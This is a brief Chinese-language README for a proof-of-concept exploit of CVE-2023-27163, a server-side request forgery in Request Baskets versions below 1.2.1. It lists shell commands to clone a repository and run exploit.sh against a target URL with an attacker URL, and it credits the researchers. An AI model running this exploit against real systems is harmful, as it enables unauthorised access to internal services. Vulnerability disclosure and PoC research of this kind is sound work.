
CVE-2023-27163 - Request Baskets SSRF
Request Baskets SSRF 概念验证
alt text
Request Baskets 版本 <1.2.1 容易通过 /api/baskets/{name} 组件遭受服务端请求伪造 (SSRF) 攻击。
git clone https://github.com/rvizx/CVE-2023-27163
cd CVE-2023-27163
chmod +x exploit.sh
./exploit.sh <target_url> <attacker_url>
感谢来自上海交通大学的 @beetle1、来自山东大学的 @chenlibo147、@houqinsheng、[email protected]。 文章:https://notes.sjtu.edu.cn/s/MUUhEymt7#